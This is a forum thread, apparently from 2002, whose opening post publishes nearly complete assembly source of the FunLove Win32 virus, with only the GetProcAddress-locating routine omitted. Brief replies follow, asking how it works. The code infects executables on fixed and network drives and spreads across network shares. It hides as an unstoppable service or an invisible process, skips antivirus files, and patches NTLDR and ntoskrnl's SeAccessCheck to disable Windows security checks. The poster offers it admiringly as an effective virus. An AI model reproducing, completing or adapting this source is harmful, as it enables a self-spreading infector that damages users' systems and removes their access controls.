|
阅读:5210回复:29
funlove 源代码公开
我把定位API的部分给去掉了
大家好好看看吧,这是我很喜欢的病毒 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FLCSS.ASM]ÄÄ? .386 LARGESTACK RADIX 16 ASSUME CS:CODE,DS:CODE CODE SEGMENT USE32 org 100 main: I equ 1000 - 300 @ equ + ebx - offset VStart INCLUDE HEADER.ASM VStart: INCLUDE HEADER.ASM ; ------------------------------------------------------------------------- ; ; ---------------------------- Startup Code --------------------------- ; ; ------------------------------------------------------------------------- ; Virus PROC NEAR call GetVS lea esi,[HostCode @] mov edi,[esp] sub edi,08 mov [esp],edi movsd movsd push dword ptr [esp + 04] call RelocKernel32 or eax,eax jz short Exit cmp byte ptr [OS @],00 jnz short NT_Srv call Create9xProcess ret NT_Srv: call CreateNTService Exit: ret Virus ENDP ; ------------------------------------------------------------------------- ; ; -------------------- NT Service Creation Routine -------------------- ; ; ------------------------------------------------------------------------- ; CreateNTService PROC PASCAL NEAR LOCAL SCM_Handle : DWORD call RelocAdvapi32 or eax,eax jz short CNT_Failed push 02 push 00 push 00 ; get the service control manager call OpenSCManagerA ; handler or eax,eax jz short CNT_Failed mov SCM_Handle,eax call CreateExecutable or eax,eax ; if process is running, just exit jz short CNT_Exit mov edi,0F01FF lea esi,[Service @] push edi push esi push SCM_Handle call OpenServiceA or eax,eax jnz short CNT_Run xor eax,eax push eax push eax push eax push eax push eax lea eax,[Buffer1 @] ; -> flcss.exe push eax push 01 ; ErrorControl push 02 ; Start push 20 ; Type push edi push 00 push esi push SCM_Handle call CreateServiceA or eax,eax jz short CNT_Failed CNT_Run: push 00 push 00 push eax call StartServiceA or eax,eax jnz short CNT_Exit CNT_Failed: call StartInfectionThread CNT_Exit: ret CreateNTService ENDP ; ------------------------------------------------------------------------- ; ; -------------------- W9x Process Creation Routine ------------------- ; ; ------------------------------------------------------------------------- ; Create9xProcess PROC NEAR call CreateExecutable or eax,eax jz short P9x_Exit P9x_00: xor eax,eax lea edi,[Buffer2 @] push edi push edi mov ecx,040 repz stosd mov cl,06 push eax loop $ - 1 lea esi,[Buffer1 @] push esi push 00 call CreateProcessA or eax,eax jnz short P9x_Exit P9x_Failed: call StartInfectionThread P9x_Exit: ret Create9xProcess ENDP ; ------------------------------------------------------------------------- ; ; --------------------- flcss.exe Creation Routine -------------------- ; ; ------------------------------------------------------------------------- ; CreateExecutable PROC PASCAL NEAR LOCAL c_FileHandle : DWORD, \\ c_BytesWritten : DWORD USES esi,edi lea edi,[Buffer1 @] push edi push 104 push edi call GetSystemDirectoryA add edi,eax mov al,\'\\\' stosb lea esi,[Process @] movsd movsd movsd push 02 ; create always call OpenFile cmp eax,-1 jz short CE_Exit mov c_FileHandle,eax lea edi,[VImports + 4 @] ; clean main import table mov eax,-1 stosd stosd lea edi,[Kernel32_Relocated @] ; restore 2nd imp. table mov eax,[edi - 8] ; (necessary for NT) stosd push 00 lea esi,c_BytesWritten push esi push 0200 push ebx push c_FileHandle call WriteFile ; write header push 00 push esi push Phys_VSize push ebx push c_FileHandle call WriteFile ; write vrs push c_FileHandle call CloseHandle CE_Exit: inc eax ret CreateExecutable ENDP ; ------------------------------------------------------------------------- ; ; --------------------------- Viral Service --------------------------- ; ; ------------------------------------------------------------------------- ; VService PROC NEAR call GetVS push dword ptr [esp] call RelocKernel32 or eax,eax jz VS_Exit cmp byte ptr [OS @],00 jz short W9x_Service_Register WNT_Service_Hacknowledge: call RelocAdvapi32 or eax,eax jz VS_Exit lea esi,[Buffer1 @] xor eax,eax lea ecx,[Service @] lea edx,[ServiceDispatcher @] mov [esi],ecx mov [esi + 04],edx mov [esi + 08],eax mov [esi + 0C],eax ; give control back to caller ; and jump to dispatcher push esi call StartServiceCtrlDispatcherA W9x_Service_Register: lea esi,[USER32_Name @] push esi call LoadLibraryA lea esi,[RegisterClassA + 7 @] push esi push eax call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax lea esi,[Buffer1 @] mov edi,esi xor eax,eax mov ecx,0A repz stosd mov dword ptr [esi + 04],-1 ; ? (must be <> 0) mov dword ptr [esi + 10],400000 ; image base lea eax,[Service @] mov [esi + 24],eax push esi call RegisterClassA ; necessary, or RSP won\'t work lea esi,[RegisterServiceProcess + 7 @] push esi push dword ptr [Kernel32_Base @] call GetProcAddress or eax,eax jz short VS_00 mov [esi - 06],eax call GetCurrentProcessId ; register our process in order push 01 ; to vanish from the task list push eax call RegisterServiceProcess push 8*1000d ; wait 8 seconds call Sleep VS_00: call StartInfectionThread VS_Exit: ret VService ENDP ; ------------------------------------------------------------------------- ; ; ----------------------- NT Service Dispatcher ----------------------- ; ; ------------------------------------------------------------------------- ; ServiceDispatcher PROC PASCAL NEAR LOCAL Service_Handle : DWORD call GetVS lea esi,[ServiceHandler @] lea edi,[Service @] push esi push edi call RegisterServiceCtrlHandlerA mov Service_Handle,eax lea esi,[Buffer1 @] mov edi,esi mov ecx,06 xor eax,eax repz stosd mov dword ptr [esi],10 mov dword ptr [esi + 04],04 mov dword ptr [esi + 08],07 push esi push Service_Handle ; now tell windows our service call SetServiceStatus ; correctly started push 8*1000d call Sleep call StartInfectionThread ret ServiceDispatcher ENDP ; ------------------------------------------------------------------------- ; ; -------------------------- Service Handler -------------------------- ; ; ------------------------------------------------------------------------- ; ServiceHandler PROC NEAR ret ; if the admin tries to halt the ; service, he\'ll get a system error ServiceHandler ENDP ; ------------------------------------------------------------------------- ; ; ------------------- Thread Creation Routine ------------------ ; ; ------------------------------------------------------------------------- ; StartInfectionThread PROC PASCAL NEAR LOCAL ThreadId : DWORD call GetTickCount mov [Rand @],eax lea eax,ThreadId push eax push 0 push 0 lea eax,[VThread @] push eax push 0 push 0 call CreateThread ret StartInfectionThread ENDP ; ------------------------------------------------------------------------- ; ; ---------------------------- Viral Thread --------------------------- ; ; ------------------------------------------------------------------------- ; VThread PROC NEAR call GetVS call InfectDrives push 60d * 1000d call Sleep call GetRand and al,1F jnz short VThread call InfectNetwork jmp short VThread VThread ENDP ; ------------------------------------------------------------------------- ; ; --------------------- Network Infection Routine --------------------- ; ; ------------------------------------------------------------------------- ; InfectNetwork PROC NEAR lea eax,[MPR_Name @] push eax call LoadLibraryA or eax,eax jz short INet_Failed push eax lea esi,[MPR_Functions @] push esi call DLL_Relocate or eax,eax jz short INet_Failed push 00 call NetSearch INet_Failed: ret InfectNetwork ENDP ; ------------------------------------------------------------------------- ; ; ---------------------- Valid Drive Test Routine --------------------- ; ; ------------------------------------------------------------------------- ; InfectDrives PROC NEAR push esi call GetTickCount mov [Tick @],eax lea esi,[Buffer1 @] mov dword ptr [esi],\' \\:@\' ID_TestDrive: mov byte ptr [esi + 03],00 push esi call GetDriveTypeA cmp al,03 ; fixed disk jz short ID_DriveOk cmp al,04 ; network drive jnz short ID_Invalid ID_DriveOk: add esi,03 push esi call BlownAway push esi call FileSearch sub esi,03 ID_Invalid: mov al,[Buffer1 @] inc al mov [Buffer1 @],al cmp al,\'Z\' jna short ID_TestDrive pop esi ret InfectDrives ENDP ; ------------------------------------------------------------------------- ; ; ----------------- Recursive Computer Search Routine ----------------- ; ; ------------------------------------------------------------------------- ; NetSearch PROC PASCAL NEAR ARG WNetStructAddr:DWORD ; pointer to the network struct (20h) LOCAL EnumBufferAddr:DWORD, \\ ; network buffer address EnumBufferSize:DWORD, \\ ; network buffer size (4000h) EnumNB_Objects:DWORD ; number of network structs enumerated USES esi, edi mov EnumBufferSize,4000 or EnumNB_Objects,-1 lea eax,WNetStructAddr push eax push WNetStructAddr push 0 push 0 push 2 call WNetOpenEnumA or eax,eax jnz NET_Close push 04 push 1000 push 4000 push 00 call VirtualAlloc or eax,eax jz short NET_Close mov EnumBufferAddr,eax NET_00: mov esi,EnumBufferAddr lea eax,EnumBufferSize push eax push esi lea eax,EnumNB_Objects push eax push WNetStructAddr call WNetEnumResourceA or eax,eax jnz short NET_Free mov ecx,EnumNB_Objects or ecx,ecx jz short NET_00 NET_01: push ecx push esi mov esi,[esi + 14] ; computer resource name or esi,esi ; (\\\\XXX\\C, for example) jz short NET_03 cmp word ptr [esi],0041 ; floppy ? jz short NET_03 lea edi,[Buffer1 @] NET_02: movsb cmp byte ptr [esi],00 jnz short NET_02 mov al,\'\\\' stosb push edi call BlownAway push edi call FileSearch NET_03: pop esi mov eax,[esi + 0C] and al,2 cmp al,2 jnz short NET_04 push esi call NetSearch NET_04: add esi,20 pop ecx loop NET_01 jmp short NET_00 NET_Free: push 8000 push 00 push EnumBufferAddr call VirtualFree NET_Close: push WNetStructAddr call WNetCloseEnum ret NetSearch ENDP ; ------------------------------------------------------------------------- ; ; ------------------- Recursive File Search Routine ------------------- ; ; ------------------------------------------------------------------------- ; FileSearch PROC PASCAL NEAR ARG CurrentDirEnd : DWORD LOCAL SearchHandle : DWORD USES esi,edi mov eax,CurrentDirEnd mov dword ptr [eax],002A2E2A ; *.* lea edi,[Buffer2 @] lea esi,[Buffer1 @] push edi push esi call FindFirstFileA cmp eax,-1 jz short RS_Exit RS_00: mov SearchHandle,eax RS_01: test byte ptr [edi],10 ; dir ? jz short FileTest RS_Directory: cmp byte ptr [edi + 2C],\'.\' jz short RS_Next mov esi,edi add esi,2C mov edi,CurrentDirEnd RSD_00: movsb cmp byte ptr [esi],0 jnz short RSD_00 mov al,\'\\\' stosb push edi call FileSearch RS_Next: lea edi,[Buffer2 @] push edi push SearchHandle call FindNextFileA or eax,eax jnz short RS_01 push SearchHandle call FindClose RS_Exit: ret FileTest: mov edx,[edi + 2C] or edx,20202020 xor edx,61F81F61 lea esi,[SkipNames @] ; check av names mov ecx,0C FT_00: lodsd cmp edx,eax jz short FT_Exit loop FT_00 mov esi,edi add esi,2C FT_01: lodsb or al,al jnz short FT_01 mov eax,[esi - 4] ; check extent or eax,20202020 cmp eax,\' xco\' jz short FT_02 cmp eax,\' rcs\' jz short FT_02 cmp eax,\' exe\' jnz short FT_Exit FT_02: mov eax,[edi + 20] ; minimum file size cmp eax,2000 jc short FT_Exit cmp al,03 ; self-infection test jz short FT_Exit lea esi,[Buffer1 @] ; get complete file name lea edi,[Buffer3 @] ; with path push edi mov ecx,CurrentDirEnd sub ecx,esi repz movsb lea esi,[Buffer2 @] add esi,2C FT_03: movsb cmp byte ptr [esi - 1],0 jnz short FT_03 call InfectFile FT_Exit: jmp RS_Next FileSearch ENDP ; ------------------------------------------------------------------------- ; ; ----------------------- File Infection Routine ---------------------- ; ; ------------------------------------------------------------------------- ; InfectFile PROC PASCAL NEAR ARG i_Filename : DWORD LOCAL i_FileHandle : DWORD, \\ i_FileSize : DWORD, \\ i_BytesRead : DWORD, \\ i_VirusOffset : DWORD, \\ i_MapHandle : DWORD, \\ i_HostDep32 : DWORD, \\ i_EP_Offset : DWORD USES esi,edi push i_Filename push 03 ; open existing call OpenFile cmp eax,-1 jz IN_Exit mov i_FileHandle,eax push 00 push eax call GetFileSize mov i_FileSize,eax cmp al,03 ; re-test if not already jz IN_Exit ; infected lea edi,[Buffer3 @] push 00 lea esi,i_BytesRead push esi push 2000 push edi push i_FileHandle call ReadFile cmp word ptr [edi],5A4Dh jnz IN_CloseFile cmp word ptr [edi + 18],0040 jnz IN_CloseFile cmp dword ptr [edi + 3C],1C00 ; Check DOS header size ja IN_CloseFile add edi,[edi + 3C] mov eax,[edi] cmp eax,00004550 jnz IN_CloseFile cmp word ptr [edi + 5C],2 ; Subsystem == GUI jnz IN_CloseFile mov esi,edi add esi,18 add si,[edi + 14] ; esi -> 1st section push esi mov eax,[edi + 28] ; now search for the ; section which contains IN_00: ; the EP mov ecx,[esi + 0C] add ecx,[esi + 08] cmp eax,ecx jc short IN_01 add esi,28 jmp short IN_00 IN_01: sub eax,[esi + 0C] add eax,[esi + 14] mov i_EP_Offset,eax or [esi + 24],80000000 ; make it writeable pop esi xor ecx,ecx mov cx,[edi + 06] dec ecx mov eax,ecx mov edx,28 mul edx add esi,eax ; esi -> last section mov eax,[esi + 24] cmp al,80 ; uninitialized ? jz IN_CloseFile or eax,8C000000 ; writeable, not cached/paged and eax,not 12000000 ; not shared/discardable mov [esi + 24],eax mov ecx,i_FileSize ; don\'t infect SFX mov edx,ecx mov eax,ecx clc shr eax,03 sub edx,eax sub edx,[esi + 14] jc short IN_02 sub edx,[esi + 10] jnc IN_CloseFile IN_02: ; calculate new last section size mov edx,[esi + 08] sub ecx,[esi + 14] jc short IN_03 cmp edx,ecx ja short IN_03 mov edx,ecx IN_03: test edx,00000FFF ; align on 1000h jz short IN_04 and edx,0FFFFF000 add edx,1000 IN_04: mov ecx,edx add ecx,[esi + 0C] mov eax,ecx add eax,Virt_VSize mov [edi + 50],eax ; new image size sub ecx,[edi + 28] add ecx,offset VStart - 100 - 08 mov i_HostDep32,ecx mov eax,edx add eax,Virt_VSize ; increase virtual size mov [esi + 08],eax mov eax,edx add eax,[esi + 14] mov i_VirusOffset,eax add edx,Phys_VSize ; increase phys. size mov [esi + 10],edx add edx,[esi + 14] add edx,03 push i_FileHandle push edx call MapFile or eax,eax jz short IN_CloseFile mov i_MapHandle,eax push eax call ViewMap or eax,eax jz short IN_CloseMap mov edx,eax lea esi,[Buffer3 @] ; write header mov edi,edx mov ecx,2000 repz movsb lea edi,[HostCode @] mov esi,i_EP_Offset add esi,edx movsd movsd mov edi,esi ; set up call gs:Virus sub edi,08 mov eax,00E8659090 stosd mov eax,i_HostDep32 stosd mov edi,edx ; fill with blanks mov eax,i_FileSize mov ecx,i_VirusOffset sub ecx,eax jna short IN_05 add edi,eax xor al,al repz stosb IN_05: mov esi,ebx ; write vrs mov edi,edx add edi,i_VirusOffset mov ecx,VSize repz movsb mov ecx,Phys_VSize - VSize + 3 repz stosb push edx call UnmapViewOfFile IN_CloseMap: push i_MapHandle call CloseHandle call Wait_A_Little IN_CloseFile: lea esi,[Buffer2 + 14 @] ; restore file time push esi sub esi,08 push esi sub esi,08 push esi push i_FileHandle call SetFileTime push i_FileHandle call CloseHandle IN_Exit: ret InfectFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------- GetProcAddress Search Routine ------------------- ; ; ------------------------------------------------------------------------- ; Whereis_GPA PROC PASCAL NEAR ARG w_Kernel32 : DWORD USES esi,edi ;here some code was omitted WG_03: ret Whereis_GPA ENDP ; ------------------------------------------------------------------------- ; ; ------------------ DLL Functions Relocation Routine ----------------- ; ; ------------------------------------------------------------------------- ; DLL_Relocate PROC PASCAL NEAR ARG DLL_Base : DWORD, \\ DLL_Func : DWORD USES esi mov esi,DLL_Func DR_00: mov eax,esi add eax,07 push eax push DLL_Base call GetProcAddress or eax,eax jz short DR_03 DR_01: mov [esi + 1],eax add esi,07 DR_02: lodsb or al,al jnz short DR_02 cmp byte ptr [esi],0B8 jz short DR_00 DR_03: ret DLL_Relocate ENDP ; ------------------------------------------------------------------------- ; ; --------------------- NT Security Patch Routine --------------------- ; ; ------------------------------------------------------------------------- ; BlownAway PROC PASCAL NEAR ARG DirEnd : DWORD USES esi,edi lea esi,[NTLDR @] mov edi,DirEnd movsd movsd lea edi,[Buffer1 @] lea esi,[NT4_NTLDR @] cmp byte ptr [OS @],01 jz short BA_00 add esi,5 * 2 BA_00: push edi push esi push 05 call PatchFile lea esi,[NTOSKRNL @] mov edi,DirEnd BA_01: movsb cmp byte ptr [esi - 1],00 jnz short BA_01 lea edi,[Buffer1 @] lea esi,[NT4_NTOSKRNL @] cmp byte ptr [OS @],01 jz short BA_02 add esi,9 * 2 BA_02: push edi push esi push 09 call PatchFile ret BlownAway ENDP ; ------------------------------------------------------------------------- ; ; ------------------------- File Patch Routine ------------------------ ; ; ------------------------------------------------------------------------- ; PatchFile PROC PASCAL NEAR ARG p_Filename : DWORD, \\ p_PatchAddr : DWORD, \\ p_PatchSize : DWORD LOCAL p_FileHandle : DWORD, \\ p_FileSize : DWORD, \\ p_MapHandle : DWORD USES esi,edi push p_Filename push 03 ; open existing call OpenFile cmp eax,-1 jz short PA_Exit mov p_FileHandle,eax push 00 push eax call GetFileSize mov p_FileSize,eax push p_FileHandle push eax call MapFile or eax,eax jz short PA_CloseFile mov p_MapHandle,eax push eax call ViewMap or eax,eax jz short PA_CloseMap mov edx,eax mov edi,eax mov esi,p_PatchAddr mov ecx,p_FileSize PA_00: push ecx push esi push edi mov ecx,p_PatchSize repz cmpsb pop edi pop esi pop ecx jz short PA_01 inc edi loop PA_00 jmp short PA_Unmap PA_01: mov ecx,p_PatchSize add esi,ecx repz movsb PA_Unmap: push edx call UnmapViewOfFile PA_CloseMap: push p_MapHandle call CloseHandle PA_CloseFile: push p_FileHandle call CloseHandle PA_Exit: ret PatchFile ENDP ; ------------------------------------------------------------------------- ; ; --------------------------- Minor Routines -------------------------- ; ; ------------------------------------------------------------------------- ; GetVS: call $ + 5 pop ebx sub ebx,offset GetVS + 5 - VStart ret ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; RelocKernel32 PROC PASCAL NEAR ARG r_Kernel32 : DWORD push r_Kernel32 call Whereis_GPA or eax,eax jz short RK_00 push eax lea esi,[Kernel32_Functions @] push esi call DLL_Relocate RK_00: ret RelocKernel32 ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; RelocAdvapi32 PROC NEAR lea eax,[ADVAPI32_Name @] push eax call LoadLibraryA or eax,eax jz short RA_00 push eax lea esi,[ADVAPI32_Functions @] push esi call DLL_Relocate RA_00: ret RelocAdvapi32 ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; OpenFile PROC PASCAL NEAR ARG o_Filename : DWORD, \\ o_OpenMode : DWORD push 20 push o_Filename call SetFileAttributesA push 00 push 80 ; normal attributes push o_OpenMode push 00 push 00 ; not shared push 0C0000000 ; r/w push o_Filename call CreateFileA ret OpenFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; MapFile PROC PASCAL NEAR ARG m_FileHandle : DWORD, \\ m_FileSize : DWORD push 00 push m_FileSize push 00 push 04 push 00 push m_FileHandle call CreateFileMappingA ret MapFile ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; ViewMap PROC PASCAL NEAR ARG v_MapHandle : DWORD push 00 push 00 push 00 push 02 push v_MapHandle call MapViewOfFile ret ViewMap ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; Wait_A_Little PROC NEAR call GetTickCount sub eax,[Tick @] ; allow thread to ; run for 4 seconds cmp eax,4*1000d jc short WAL_00 push 16d*1000d ; then wait 16 seconds call Sleep call GetTickCount mov [Tick @],eax WAL_00: ret Wait_A_Little ENDP ; ------------------------------------------------------------------------- ; ; ------------------------------------------------------------------------- ; GetRand PROC NEAR push ecx push edx mov eax,[Rand @] xor edx,edx mov ecx,7FFFFFFF mul ecx inc eax mov ecx,0FFFFFFFBh div ecx mov eax,edx mov [Rand @],eax pop edx pop ecx ret GetRand ENDP ; ------------------------------------------------------------------------- ; ; -------------------------- INITIALIZED DATA ------------------------- ; ; ------------------------------------------------------------------------- ; HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2 NT4 db 0C2,04,00,55,8Bh,4C,24,0C W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db \'NTLDR\',0 NT4_NTLDR db 3Bh,46,58,74,07 ; signature (file check) db 3Bh,46,58,0EBh,07 ; patch W2K_NTLDR db 3Bh,47,58,74,07 db 3Bh,47,58,0EBh,07 NTOSKRNL db \'WINNT\\System32\\ntoskrnl.exe\',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ; SeAccessCheck db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00 W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28 SkipNames: dd 139D7300h ; aler dd 0F977200h ; amon dd 118E7E1Eh ; _avp dd 52886900h ; avp3 dd 0C886900h ; avpm dd 13883207h ; f-pr dd 168E7E0Fh ; navw dd 0F997C12h ; scan dd 128B7212h ; smss dd 04907B05h ; ddhe dd 00946F05h ; dpla dd 00946F0Ch ; mpla Process db \'flcss.exe\',0 Service db \'FLC\',0 ; Minimal Import Section VImports: dd offset Kernel32_Pointers + I dd -1,-1 dd offset Kernel32_Name + I dd offset Kernel32_Relocated + I db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep + I, 0 Kernel32_Relocated dd offset Kernel32_Beep + I, 0 Kernel32_Beep db ?,?,\'Beep\',0 ; Virus Imports Kernel32_Name db \'KERNEL32.dll\',0 Kernel32_Functions: CloseHandle: db 0B8,?,?,?,?,0FF,0E0,\'CloseHandle\',0 CreateFileA: db 0B8,?,?,?,?,0FF,0E0,\'CreateFileA\',0 CreateFileMappingA: db 0B8,?,?,?,?,0FF,0E0,\'CreateFileMappingA\',0 CreateProcessA: db 0B8,?,?,?,?,0FF,0E0,\'CreateProcessA\',0 CreateThread: db 0B8,?,?,?,?,0FF,0E0,\'CreateThread\',0 FindFirstFileA: db 0B8,?,?,?,?,0FF,0E0,\'FindFirstFileA\',0 FindNextFileA: db 0B8,?,?,?,?,0FF,0E0,\'FindNextFileA\',0 FindClose: db 0B8,?,?,?,?,0FF,0E0,\'FindClose\',0 GetCurrentProcessId: db 0B8,?,?,?,?,0FF,0E0,\'GetCurrentProcessId\',0 GetDriveTypeA: db 0B8,?,?,?,?,0FF,0E0,\'GetDriveTypeA\',0 GetFileSize: db 0B8,?,?,?,?,0FF,0E0,\'GetFileSize\',0 GetProcAddress: db 0B8,?,?,?,?,0FF,0E0,\'GetProcAddress\',0 GetTickCount: db 0B8,?,?,?,?,0FF,0E0,\'GetTickCount\',0 GetSystemDirectoryA: db 0B8,?,?,?,?,0FF,0E0,\'GetSystemDirectoryA\',0 LoadLibraryA: db 0B8,?,?,?,?,0FF,0E0,\'LoadLibraryA\',0 MapViewOfFile: db 0B8,?,?,?,?,0FF,0E0,\'MapViewOfFile\',0 ReadFile: db 0B8,?,?,?,?,0FF,0E0,\'ReadFile\',0 SetFileAttributesA: db 0B8,?,?,?,?,0FF,0E0,\'SetFileAttributesA\',0 SetFileTime: db 0B8,?,?,?,?,0FF,0E0,\'SetFileTime\',0 Sleep: db 0B8,?,?,?,?,0FF,0E0,\'Sleep\',0 UnmapViewOfFile: db 0B8,?,?,?,?,0FF,0E0,\'UnmapViewOfFile\',0 VirtualAlloc: db 0B8,?,?,?,?,0FF,0E0,\'VirtualAlloc\',0 VirtualFree: db 0B8,?,?,?,?,0FF,0E0,\'VirtualFree\',0 WriteFile: db 0B8,?,?,?,?,0FF,0E0,\'WriteFile\',0 ; this function does only exist under Win9x db 0 RegisterServiceProcess: db 0B8,?,?,?,?,0FF,0E0,\'RegisterServiceProcess\',0 USER32_Name db \'USER32.dll\',0 RegisterClassA: db 0B8,?,?,?,?,0FF,0E0,\'RegisterClassA\',0 ADVAPI32_Name db \'ADVAPI32.dll\',0 ADVAPI32_Functions: OpenSCManagerA: db 0B8,?,?,?,?,0FF,0E0,\'OpenSCManagerA\',0 OpenServiceA: db 0B8,?,?,?,?,0FF,0E0,\'OpenServiceA\',0 CreateServiceA: db 0B8,?,?,?,?,0FF,0E0,\'CreateServiceA\',0 StartServiceA: db 0B8,?,?,?,?,0FF,0E0,\'StartServiceA\',0 StartServiceCtrlDispatcherA: db 0B8,?,?,?,?,0FF,0E0,\'StartServiceCtrlDispatcherA\',0 RegisterServiceCtrlHandlerA: db 0B8,?,?,?,?,0FF,0E0,\'RegisterServiceCtrlHandlerA\',0 SetServiceStatus: db 0B8,?,?,?,?,0FF,0E0,\'SetServiceStatus\',0 MPR_Name db \'MPR.dll\',0 MPR_Functions: WNetOpenEnumA: db 0B8,?,?,?,?,0FF,0E0,\'WNetOpenEnumA\',0 WNetEnumResourceA: db 0B8,?,?,?,?,0FF,0E0,\'WNetEnumResourceA\',0 WNetCloseEnum: db 0B8,?,?,?,?,0FF,0E0,\'WNetCloseEnum\',0 VEnd: ; ------------------------------------------------------------------------- ; ; ------------------------- UNINITIALIZED DATA ------------------------ ; ; ------------------------------------------------------------------------- ; Kernel32_Base dd ? Rand dd ? Tick dd ? OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; Current Directory Buffer2 db 200 dup (?) ; Search Buffer Buffer3 db 2000 dup (?) ; Read Buffer VSize equ offset VEnd - VStart Phys_VSize equ 1000 Virt_VSize equ 4000 CODE ENDS END main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FLCSS.ASM]ÄÄ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HEADER.ASM]ÄÄ? db 4Dh,5A, 90, 00, 03, 00, 00, 00, 04, 00, 00, 00,0FF,0FF, 00, 00 db 0B8, 00, 00, 00, 00, 00, 00, 00, 40, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 80, 00, 00, 00 db 0E, 1F,0BA, 10, 00,0B4, 09,0CDh,21,0B0,0F0,0E6, 64,0EBh,0FE,90 db 7E, 46, 75, 6E, 20, 4C, 6F, 76, 69, 6E, 67, 20, 43, 72, 69, 6Dh db 69, 6E, 61, 6C, 7E, 0Dh,0Dh,0A, 24, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 50, 45, 00, 00, 4C, 01, 01, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00,0E0, 00, 0E, 01, 0Bh,01, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00 dd offset VService + I ; Entrypoint db 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 40, 00, 00, 10, 00, 00, 00, 02, 00, 00 db 04, 00, 00, 00, 00, 00, 00, 00, 04, 00, 00, 00, 00, 00, 00, 00 dd 1000 + Virt_VSize ; Image size db 00, 02, 00, 00, 00, 00, 00, 00, 02, 00, 00, 00 db 00, 00, 10, 00, 00, 10, 00, 00, 00, 00, 10, 00, 00, 10, 00, 00 db 00, 00, 00, 00, 10, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 dd offset VImports + I ; ImportDirectory dd 14h db 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 db 00, 00, 00, 00, 00, 00, 00, 00 db \'.code\',0,0,0 ; main section dd Virt_VSize dd 00001000h dd Phys_VSize dd 00000200h db 0C dup (?) dd 0C0000020h db 60 dup (?) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HEADER.ASM]ÄÄ? |
|
最新喜欢: amei
|
|
沙发#
发布于:2002-05-28 18:58
太长,能不能讲讲原理?
|
|
|
板凳#
发布于:2002-05-28 19:00
太长,能不能讲讲原理? 我现在没空写太长的详细分析。关于这个病毒www.symantec.com上有详细的分析 |
|
|
|
地板#
发布于:2002-05-28 21:30
不能全部分析,能不能挑一两段亮点说一说 :D
|
|
|
|
地下室#
发布于:2002-05-28 21:48
我上汇编是我老师就从杨基病毒里取出使用常驻内存的技术给我们分析,我觉得挺好
|
|
|
|
5楼#
发布于:2002-05-28 21:54
我上汇编是我老师就从杨基病毒里取出使用常驻内存的技术给我们分析,我觉得挺好 兄弟,你不要让我晕倒好不好 那是DOS病毒了,而且不是最好的 现在都是Win32病毒了 :o :( |
|
|
|
6楼#
发布于:2002-05-28 22:00
我只是举个例嘛,而且我老师就是这么干的,至少我觉得这样可以学到东西.所以你可以拿段比较精华的代码分析分析,大家再讨论讨论,我们再学习学习,不是很好嘛,当然,可能要花些时间 :D
|
|
|
|
7楼#
发布于:2002-05-28 22:04
我只是举个例嘛,而且我老师就是这么干的,至少我觉得这样可以学到东西.所以你可以拿段比较精华的代码分析分析,大家再讨论讨论,我们再学习学习,不是很好嘛,当然,可能要花些时间 :D 兄弟,我现在确实没时间,要忙着郁闷和找工作 :D 你可以仔细看一下funlove的源代码,很不错的,虽然不简练,但确实是个很有效的病毒 |
|
|
|
8楼#
发布于:2002-05-28 22:07
理解,我也是刚找到工作,都没签呢,知道今年找工作的痛苦。
只能祝你早日找到满意的工作吧 |
|
|
|
9楼#
发布于:2002-05-28 22:09
